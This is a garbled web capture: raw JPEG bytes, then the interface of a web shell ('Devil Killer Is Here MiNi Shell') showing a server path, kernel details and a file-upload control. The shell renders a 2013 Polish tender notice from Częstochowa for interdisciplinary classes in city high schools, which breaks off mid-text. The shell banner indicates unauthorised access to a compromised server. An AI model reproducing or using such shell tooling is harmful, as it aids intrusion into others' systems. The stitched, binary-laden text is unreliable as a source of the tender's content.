JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130422/157532-N-2013.html

<p class="kh_header"><b>Częstochowa: Przeprowadzenie profilowanych zajęć interdyscyplinarnych w dziesięciu liceach ogólnokształcących dla których organem prowadzącym jest Gmina Miasto Częstochowa w latach 2013 i 2014 na potrzeby projektu Zaplanuj swoją karierę</b><br>
<b>Numer ogłoszenia: 157532 - 2013; data zamieszczenia: 22.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. 34 3707100, faks 34 3707170.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie profilowanych zajęć interdyscyplinarnych w dziesięciu liceach ogólnokształcących dla których organem prowadzącym jest Gmina Miasto Częstochowa w latach 2013 i 2014 na potrzeby projektu Zaplanuj swoją karierę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa przeprowadzenia profilowanych zajęć interdyscyplinarnych w dziesięciu liceach ogólnokształcących dla których organem prowadzącym jest Gmina Miasto Częstochowa w latach 2013 i 2014 na potrzeby projektu Zaplanuj swoją karierę, Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój Wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
Zajęcia prowadzone będą od poniedziałku do piątku w pomieszczeniach udostępnionych przez dyrektorów szkół. W dni nauki zajęcia będą mogły odbywać się w przerwach między poszczególnymi zajęciami wynikającymi z planu zajęć oraz przed lub po odbyciu wszystkich zajęć lekcyjnych w danym dniu. Zamawiający zastrzega sobie możliwość zmiany powyższych terminów po konsultacjach z Wykonawcą. Harmonogram realizacji przedmiotu zamówienia będzie na bieżąco konsultowany z Zamawiającym i dostosowany do możliwości lokalowych i czasowych szkół biorących udział w projekcie oraz uczestników projektu. 
Zajęcia będą prowadzone w zależności od wyniku procesu rekrutacji i bieżącej realizacji zajęć z ewentualnym podziałem na grupy i z częstotliwością realizacji zajęć wskazanymi przez Zamawiającego.
Podane liczby godzin na poszczególne części są orientacyjne i w toku realizacji umowy liczba godzin może ulec zmianie.
Jedną godzinę zajęć należy traktować jako godzinę lekcyjną, tj. 45 minut.
Wykonawca zobowiązany będzie do przygotowania i przeprowadzenia testów badających poziom wiedzy uczestników na początku i na zakończenie udziału w zajęciach oraz do przygotowania i przedłożenia Zamawiającemu scenariuszów zajęć na danym profilu.
Za realizację zamówienia Wykonawcy będzie przysługiwać wynagrodzenie stanowiące iloczyn przewidywanej liczby godzin realizacji usługi oraz oferowanej ceny jednostkowej za 1 godzinę za wykonywanie usługi.

Zamówienie podzielone jest na 43 części:

CZĘŚĆ nr 1: Prowadzenie zajęć interdyscyplinarnych (profil ekonomiczny) w I Liceum Ogólnokształcącym im. J. Słowackiego
Przedmioty na profilu: matematyka, geografia
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 6 osoby.

CZĘŚĆ nr 2: Prowadzenie zajęć interdyscyplinarnych (profil medyczny) w I Liceum Ogólnokształcącym im. J. Słowackiego
Przedmioty na profilu: biologia, chemia, fizyka
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 6 osoby.

CZĘŚĆ nr 3: Prowadzenie zajęć interdyscyplinarnych (profil humanistyczny)w I Liceum Ogólnokształcącym im. J. Słowackiego
Przedmioty na profilu: j. polski, historia, WOS
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 6 osoby.

CZĘŚĆ nr 4: Prowadzenie zajęć interdyscyplinarnych (profil informatyczny) w II Liceum Ogólnokształcącym im. R. Traugutta
Przedmioty na profilu: informatyka, matematyka
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 11 osób.

CZĘŚĆ nr 5: Prowadzenie zajęć interdyscyplinarnych (profil medyczny) w II Liceum Ogólnokształcącym im. R. Traugutta
Przedmioty na profilu: biologia, chemia, fizyka
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 20 osób.

CZĘŚĆ nr 6: Prowadzenie zajęć interdyscyplinarnych (profil humanistyczny) w II Liceum Ogólnokształcącym im. R. Traugutta
Przedmioty na profilu: j. polski, historia, WOS
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 8 osób.

CZĘŚĆ nr 7: Prowadzenie zajęć interdyscyplinarnych (profil informatyczny)
 w III Liceum Ogólnokształcącym im. dr. W. Biegańskiego
Przedmioty na profilu: informatyka, matematyka
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 24 osób.

CZĘŚĆ nr 8: Prowadzenie zajęć interdyscyplinarnych (profil ekonomiczny) w III Liceum Ogólnokształcącym im. dr. W. Biegańskiego
Przedmioty na profilu: matematyka, geografia
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 18 osób.

CZĘŚĆ nr 9: Prowadzenie zajęć interdyscyplinarnych (profil medyczny) w III Liceum Ogólnokształcącym im. dr. W. Biegańskiego
Przedmioty na profilu: biologia, chemia, fizyka
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 9 osób.

CZĘŚĆ nr 10: Prowadzenie zajęć interdyscyplinarnych (prawo i nauki polityczne) w III Liceum Ogólnokształcącym im. dr. W. Biegańskiego
Przedmioty na profilu: historia,WOS,geografia
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 10 osób.

CZĘŚĆ nr 11: Prowadzenie zajęć interdyscyplinarnych (Profil humanistyczny) w III Liceum Ogólnokształcącym im. dr. W. Biegańskiego
Przedmioty na profilu: historia,WOS,j. polski
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 8 osób.
CZĘŚĆ nr 12: Prowadzenie zajęć interdyscyplinarnych o (profil informatyczny) w IV Liceum Ogólnokształcącym im. H. Sienkiewicza
Przedmioty na profilu: informatyka,matematyka
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 16 osób.

CZĘŚĆ nr 13: Prowadzenie zajęć interdyscyplinarnych o (profil techniczny) w IV Liceum Ogólnokształcącym im. H. Sienkiewicza
Przedmioty na profilu: fizyka,matematyka
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 17 osób.

CZĘŚĆ nr 14: Prowadzenie zajęć interdyscyplinarnych o (profil ekonomiczny) w IV Liceum Ogólnokształcącym im. H. Sienkiewicza
Przedmioty na profilu: geografia,matematyka
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 18osób.

CZĘŚĆ nr 15: Prowadzenie zajęć interdyscyplinarnych o (profil medyczny) w IV Liceum Ogólnokształcącym im. H. Sienkiewicza
Przedmioty na profilu: biologia,chemia,fizyka
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 2;
Przewidywana liczba uczestników zajęć wynosi 52 osób.

CZĘŚĆ nr 16: Prowadzenie zajęć interdyscyplinarnych o (profil Prawo i nauki polityczne) w IV Liceum Ogólnokształcącym im. H. Sienkiewicza
Przedmioty na profilu: historia,WOS,geografia
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 7 osób.

CZĘŚĆ nr 17: Prowadzenie zajęć interdyscyplinarnych o (profil informatyczny) w V Liceum Ogólnokształcącym im. A. Mickiewicza
Przedmioty na profilu: informatyka,matematyka
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 5 osób.

CZĘŚĆ nr 18: Prowadzenie zajęć interdyscyplinarnych (profil ekonomiczny) w V Liceum Ogólnokształcącym im. A. Mickiewicza
Przedmioty na profilu: matematyka,geografia
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 5 osób.

CZĘŚĆ nr 19: Prowadzenie zajęć interdyscyplinarnych (profil medyczny) w V Liceum Ogólnokształcącym im. A. Mickiewicza
Przedmioty na profilu: biologia,chemia,fizyka
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 18 osób.

CZĘŚĆ nr 20: Prowadzenie zajęć interdyscyplinarnych (profil psychologiczno-pedagogiczny) w V Liceum Ogólnokształcącym im. A. Mickiewicza
Przedmioty na profilu: język polski,historia,biologia
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 17 osób.

CZĘŚĆ nr 21: Prowadzenie zajęć interdyscyplinarnych (profil Prawo i nauki polityczne)
w V Liceum Ogólnokształcącym im. A. Mickiewicza
Przedmioty na profilu: historia,WOS,geografia
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 5 osób.

CZĘŚĆ nr 22: Prowadzenie zajęć interdyscyplinarnych (profil humanistyczny) w V Liceum Ogólnokształcącym im. A. Mickiewicza
Przedmioty na profilu: historia,WOS,j. polski
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 10 osób.

CZĘŚĆ nr 23 :  Prowadzenie zajęć interdyscyplinarnych (profil informatyczny) w VI Liceum Ogólnokształcącym im. J. Dąbrowskiego
Przedmioty na profilu: informatyka,matematyka
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 6 osób.

CZĘŚĆ nr 24: Prowadzenie zajęć interdyscyplinarnych (profil medyczny) w VI Liceum Ogólnokształcącym im. J. Dąbrowskiego
Przedmioty na profilu: biologia,chemia,fizyka
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 5 osób.

CZĘŚĆ nr 25: Prowadzenie zajęć interdyscyplinarnych (profil humanistyczny) w VI Liceum Ogólnokształcącym im. J. Dąbrowskiego
Przedmioty na profilu: j. polski,historia,WOS
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć: 2
Przewidywana liczba uczestników zajęć wynosi 26 osób.

CZĘŚĆ nr 26: Prowadzenie zajęć interdyscyplinarnych (profil ekonomiczny) w VII Liceum Ogólnokształcącym im. M. Kopernika
Przedmioty na profilu: matematyka,geografia
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 17 osób.

CZĘŚĆ nr 27: Prowadzenie zajęć interdyscyplinarnych (profil medyczny) w VII Liceum Ogólnokształcącym im. M. Kopernika
Przedmioty na profilu: biologia,chemia,fizyka
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 5 osób.

CZĘŚĆ nr 28: Prowadzenie zajęć interdyscyplinarnych (profil Profil psychologiczno-pedagogiczny) w VII Liceum Ogólnokształcącym im. M. Kopernika
Przedmioty na profilu: j. polski,historia,biologia
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 6 osób.

CZĘŚĆ nr 29: Prowadzenie zajęć interdyscyplinarnych (profil Prawo i nauki polityczne) w VII Liceum Ogólnokształcącym im. M. Kopernika
Przedmioty na profilu: historia,WOS,geografia
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 9 osób.

CZĘŚĆ nr 30: Prowadzenie zajęć interdyscyplinarnych (profil humanistyczny) w VII Liceum Ogólnokształcącym im. M. Kopernika
Przedmioty na profilu: j. polski,historia,WOS
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 19 osób.

CZĘŚĆ nr 31: Prowadzenie zajęć interdyscyplinarnych (profil informatyczny) w VIII Liceum Ogólnokształcącym Samorządowym
Przedmioty na profilu: informatyka, matematyka;
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 7 osób.

CZĘŚĆ nr 32: Prowadzenie zajęć interdyscyplinarnych (profil ekonomiczny) w VIII Liceum Ogólnokształcącym Samorządowym
Przedmioty na profilu: matematyka, geografia;
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 7 osób.

CZĘŚĆ nr 33: Prowadzenie zajęć interdyscyplinarnych (profil medyczny) w VIII Liceum Ogólnokształcącym Samorządowym
Przedmioty na profilu: biologia, chemia, fizyka;
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 16 osób.

CZĘŚĆ nr 34: Prowadzenie zajęć interdyscyplinarnych (profil psychologiczno-pedagogiczny) w VIII Liceum Ogólnokształcącym Samorządowym
Przedmioty na profilu: język polski, biologia, historia;
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 17 osób.

CZĘŚĆ nr 35: Prowadzenie zajęć interdyscyplinarnych (profil prawo i nauki polityczne) w VIII Liceum Ogólnokształcącym Samorządowym
Przedmioty na profilu: historia, WOS, geografia;
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 10 osób.

CZĘŚĆ nr 36: Prowadzenie zajęć interdyscyplinarnych (profil humanistyczny) w VIII Liceum Ogólnokształcącym Samorządowym
Przedmioty na profilu: język polski, historia, WOS;
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 4 osób.

CZĘŚĆ nr 37:  Prowadzenie zajęć interdyscyplinarnych (profil prawo i nauki polityczne) w IX Liceum Ogólnokształcącym im. C.K. Norwida
Przedmioty na profilu: historia, WOS, geografia;
Przewidywana liczba osób prowadzących zajęcia: 3 osoby; 
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 14 osób.

CZĘŚĆ nr 38: Prowadzenie zajęć interdyscyplinarnych (profil informatyczny) w XII Liceum Ogólnokształcącym im. St. Żeromskiego
Przedmioty na profilu: informatyka,matematyka
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 9 osób.

CZĘŚĆ nr 39: Prowadzenie zajęć interdyscyplinarnych (profil ekonomiczny) w XII Liceum Ogólnokształcącym im. St. Żeromskiego
Przedmioty na profilu: matematyka,geografia
Przewidywana liczba osób prowadzących zajęcia: 2 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 8 osób.

CZĘŚĆ nr 40: Prowadzenie zajęć interdyscyplinarnych (profil medyczny) w XII Liceum Ogólnokształcącym im. St. Żeromskiego
Przedmioty na profilu: biologia,chemia,fizyka
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 18 osób.

CZĘŚĆ nr 41: Prowadzenie zajęć interdyscyplinarnych (profil Profil psychologiczno-pedagogiczny) w XII Liceum Ogólnokształcącym im. St. Żeromskiego
Przedmioty na profilu: j. polski,historia,biologia
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 17 osób.

CZĘŚĆ nr 42: Prowadzenie zajęć interdyscyplinarnych (profil Prawo i nauki polityczne) w XII Liceum Ogólnokształcącym im. St. Żeromskiego
Przedmioty na profilu: historia,WOS,geografia
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 6 osób.

CZĘŚĆ nr 43: Prowadzenie zajęć interdyscyplinarnych (profil humanistyczny) w XII Liceum Ogólnokształcącym im. St. Żeromskiego
Przedmioty na profilu: j. polski,historia,WOS
Przewidywana liczba osób prowadzących zajęcia: 3 osoby;
Przewidywana ilość godzin zajęć w okresie realizacji zamówienia wynosi: 45 h; 
Przewidywana liczba grup zajęć : 1;
Przewidywana liczba uczestników zajęć wynosi 4 osób..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.20.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 43.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga złożenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się wykonawcy, którzy w zakresie poszczególnych części dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia, spełniającymi poniższe kryteria:
a) wykształcenie wyższe o kierunku zgodnym z przedmiotem/przedmiotami nauczania (wskazane przy opisie poszczególnych części w pkt 3.1) w ramach danej części na którą składana jest oferta (np. matematyka, historia, j.polski) lub posiadanie dokumentów potwierdzających kwalifikacje do nauczania przedmiotu/przedmiotów zgodnych z częścią zamówienia na którą składana jest oferta (np. matematyka, historia, j.polski).
b) doświadczenie w pracy z młodzieżą ponadgimnazjalną;
